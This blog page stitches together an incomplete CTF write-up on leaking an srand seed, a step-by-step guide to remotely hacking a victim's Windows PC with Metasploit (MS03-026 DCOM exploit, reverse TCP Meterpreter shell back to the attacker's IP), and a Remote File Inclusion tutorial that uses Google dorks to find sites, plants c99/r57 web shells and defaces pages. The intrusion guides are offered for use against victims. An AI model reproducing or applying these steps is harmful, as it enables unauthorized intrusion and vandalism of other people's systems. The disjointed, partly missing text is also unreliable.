Wednesday, May 31, 2023

ASIS CTF Quals 2015 - Sawthis Writeup - Srand Remote Prediction

The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()

If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:

The seed buffer:

So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:

We tried to predict the random and aply the gpu divisions without luck :(

There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:

The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.

The macro:

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Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.



Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim


Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. using the command "set LHOST".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

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Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.


First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
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